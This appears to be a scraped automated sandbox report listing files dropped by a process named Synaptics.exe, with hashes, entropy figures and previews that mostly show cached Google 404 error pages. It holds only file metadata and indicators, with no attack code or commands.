                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\1YOJATa.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.263372021919899
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+00IbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ab+pAZewRDK4mW
                                                                                                                                                                          MD5:470427D55FF6FF03F5B49D5BF7E181F2
                                                                                                                                                                          SHA1:434562D73E08FC0B4F6B40CCBA30A10C819A931F
                                                                                                                                                                          SHA-256:FEF4EA1C9CAEBA8FB02AC25426AEC00D018FA1BF6F53792EFF4C497FA4E40A9F
                                                                                                                                                                          SHA-512:A33ACF9B8D1E2D47DEFAA4BC0BB72C992E67DA9E25482D5655D2CD221E47043F8FF6D7D73EABC851BE6EC7C5F9F2D444D37BA9D966216CB7F12AEBADDEF12F66
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zChFu6ksVeIeijU-8HsB8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\26IWq4W.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.272866444627129
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+041bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+v5+pAZewRDK4mW
                                                                                                                                                                          MD5:94809179AADD791CB6DEA430E9D16E20
                                                                                                                                                                          SHA1:20CEB151C5D8407CA38E1FFB2AFF4097705822DF
                                                                                                                                                                          SHA-256:C12441F0D27E25EE29D3BCB64DD460EAFBEC39F68BCC5CBEBB9493EF9E83FC51
                                                                                                                                                                          SHA-512:FE004B8EE8A308312A945DC908AD2EFA05715B6F5A2A767675C297F4C8C7E6415DD0D532E4FB6378B8E6E781904793E73EC3662465E51123EF9E3AB318B9DDFB
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DOnb2JQpJZOK4zbXrmP2YA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\26rt6bG.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.258096474517234
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0rk0SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6k0+pAZewRDK4mW
                                                                                                                                                                          MD5:87126EC1C6797A18C71E558BC2FE2105
                                                                                                                                                                          SHA1:5452A4C08467AF718C4F5242CD32D02FEAA6124B
                                                                                                                                                                          SHA-256:101B08E5CEDEBAFCA7F19592812798A85501043DF2D050C22820E55007B8DF5C
                                                                                                                                                                          SHA-512:94D55CE63852B060BCA2FEAE26265D87A9942C6A13B32ABB84C287E730D499DA45166102E278414DA6D31D0B18D41C9A65645F1008E35B75F05A48229E8A6DFC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="338lu4g907VczKkP57nZVw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\3wV3Wry.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.270678240340653
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0eSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                                                                                          MD5:3FA1EA0F30A169B630375398DD3F220D
                                                                                                                                                                          SHA1:08E7911314532D30CEADCE6797969010F980B884
                                                                                                                                                                          SHA-256:C38E2FA4C24E300B5A0872831F973F5603BB6F74B2346857FE1F96F7A22787A6
                                                                                                                                                                          SHA-512:111F7485E93D26B3BE02B8544C9B6B9AE1BE7561E237875204614901E0B8CAF0F8E62CB7C057332A516E0208845697B21D087193FB96D9AAE987316021118D5A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gKOlxQsT2ejYDWMwROCc5A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\5HcdJ5c.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.2544759443642155
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0qfQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F4+pAZewRDK4mW
                                                                                                                                                                          MD5:AF0BA5CDFCE87834D14285158D81753A
                                                                                                                                                                          SHA1:3B582215A68BDC903B056DDCCC86556DF937DEA6
                                                                                                                                                                          SHA-256:81FEF9477A7DE24DA3838EE619AEA36B092999148A71EE73DBBD27380A692069
                                                                                                                                                                          SHA-512:F8EFF7A4C750D46FEADD2E0E125576B5038771BFE98767086B2D5130A00258357A8B2ED20C91DF633196700D9071337C6FA3E2D694236B17D411F072AEF057D2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="E-kRccdM0i9WTdG1_QB8ng">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\6ONAHZP.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.262087849349386
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0OSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                                                                          MD5:5790A39E27A68137D59CE25663786E2E
                                                                                                                                                                          SHA1:0C6B15353740EA1A6C2D8FDD7D8FC14A9A06AD23
                                                                                                                                                                          SHA-256:3B9A5A512B4A7C0E57A75D74CE94B60F5CA305AA6863DF0F3C6BEA5666E89729
                                                                                                                                                                          SHA-512:9AF82B1E8C0950580A2B1217DF19FEBE4398F220FE753361807F607A737011FA9FD426125231DAFA969DB3CC4301DAE5138492557732821D457D324412DA50B9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ozVq4XidKhkuTNxCSLh7Ew">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\6cY5TFO.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.271096963902499
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0IuzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+wz+pAZewRDK4mW
                                                                                                                                                                          MD5:2D5BA1ACD8829E7F1AC642409A0924F7
                                                                                                                                                                          SHA1:0F98BC8EAADBF01E6BE30F332B575679BA52FB4E
                                                                                                                                                                          SHA-256:E695CABBD178F8E3D0F4E3CF668895215E785A12502D1B4359515CDD821B0AD0
                                                                                                                                                                          SHA-512:08E4879FC25F4E4E4381A58A90387A840BF06C8AE062867DED7CEE9CEB3BB445B9391C45AC1E4EF1A220ADDA2FB369B10DFEC39E18C138D26F12AF5239522952
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="azwfQEPpAL3SsBi9CJYZaw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\9dIDi2X.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.2571266931469545
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0RCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H+pAZewRDK4mW
                                                                                                                                                                          MD5:6E1103292BC02AE3AA9075ECC7AA988B
                                                                                                                                                                          SHA1:04BA32F3738C3AFD34AC05D4C65AA522E3AE32D6
                                                                                                                                                                          SHA-256:228E689B2E197E3C9E49EF76A56FD584AE40BA42803D7AD43BA4B2958F51A6D5
                                                                                                                                                                          SHA-512:4DEFBFA6133D3485EDB7242EC554299EF5C8BA6A099D3DF682C23B02F8EF487FBB8121B0F1582BAA7670035A51B8A33FCA773D395F453AEFA973E4C24356027E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a_vGTOaPcU8925BIbdeObw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\9iLoUuX.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.254183540659821
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0ZFSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+OF+pAZewRDK4mW
                                                                                                                                                                          MD5:FC316869FA4C9D7BBAFAE268ACF3EBB1
                                                                                                                                                                          SHA1:3D168C11E8DD2227C74AEEB218024BDD02794979
                                                                                                                                                                          SHA-256:ED6F8F98D46FE0EEF39A59045BB2DEB3C4E9900C5681A7B4B45EE42D10AFCFEC
                                                                                                                                                                          SHA-512:1457DA4B524D61B8542BE4BC64EFDDCC3318B03FC57B1BBFA422B301659AACE8AF6D2AFDCCA3E2615A8CBC84A022C944AD2611583B60E887A82A901BDCC2CC83
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lQK_paD12sJouNFIyXnf-g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\APQCOtd.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.265917128806119
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0BnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++n+pAZewRDK4mW
                                                                                                                                                                          MD5:114FAE87A44BAD1054D5E347D70203E5
                                                                                                                                                                          SHA1:B4105763F3D2BCC2BCEFEEB6B4927B502F71A221
                                                                                                                                                                          SHA-256:5880125A54378A2335F78572F8C5F6EB456FC5A831BC87147D346DDEC486E5FE
                                                                                                                                                                          SHA-512:80057CCB70EF15E217E01B721637C854192EBEEF6BEFDC8914FFE90E68A0CB4BAC03F3B8CD1F6B6F3E34F8E2914E0517FED370976776711DEBB959D830236AF7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6ESI33NHA9euU7i4Fpjo0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\AhyvgzR.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.27198139397482
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0FTDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+O3+pAZewRDK4mW
                                                                                                                                                                          MD5:4A197C03CFC77EDDEAA3FA54AEB2BEA4
                                                                                                                                                                          SHA1:B699C2EA73B3C5708C27D3B62EDFE653F9B54922
                                                                                                                                                                          SHA-256:AF84215360A475A354C304796710D12BC079B7EDD71410834821FD785C866D15
                                                                                                                                                                          SHA-512:C6BD502547932DD49109CFAD4D3F438DFC82A9F8628A213ACE4932AF2E8DBC29E69FD5B06FC397136A80460BD5E542EBD811C1537DD107386DC7E48A4A195CDC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TeR7wbBEVS7_WSSRLhWJdA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\BcNPEtc.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.250452657886789
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0cXDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+h+pAZewRDK4mW
                                                                                                                                                                          MD5:4EE11818CC3B95B4DF665D3C27B548B9
                                                                                                                                                                          SHA1:BD5AF547003DE65A7C25E39C3F966F67E566CFD1
                                                                                                                                                                          SHA-256:16AD25302A3B956CA548B576ADE61B6BDD3FF995E4796ED2D091787B19460BD2
                                                                                                                                                                          SHA-512:C9701E40C7029A4F64A4447579D288B31650655B6FFABA8E7214A089384EA46B6FB696A5634C99351EF80EA5E04F5FE4C6DB2ECFB43420D80FE3214FC53D5C95
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uahkuh4mPTt8nRx-By9qSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\DuXpBCA.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.271553559999301
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0YFzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                                                                          MD5:35A2CFB8718B1B09146FE3DA052EDA58
                                                                                                                                                                          SHA1:42EE2FC2CFEBE73606DE6B440A0C28F6CE82C0E6
                                                                                                                                                                          SHA-256:257A743CE32F83022DD891A63FF0B9404D45B50E89B127682F4294598EDBB7ED
                                                                                                                                                                          SHA-512:3572F311D5E827D3C82CFEBDCAF2785E669E27A2F00752EB162BF6EFD19A3D13395573F49AFDC2BB6BBB3D364C7D1522EBA3EA7C6DB7612131DCBD12A1A54FE2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9rOPw9qY11VGN6W1EtSp1Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\EjTgvsv.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.264385738280794
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
                                                                                                                                                                          MD5:D34A3A0B975770D49CE5D5328D75FC91
                                                                                                                                                                          SHA1:06E79AF16785CD98BFD64A94C97BEB740A930B3B
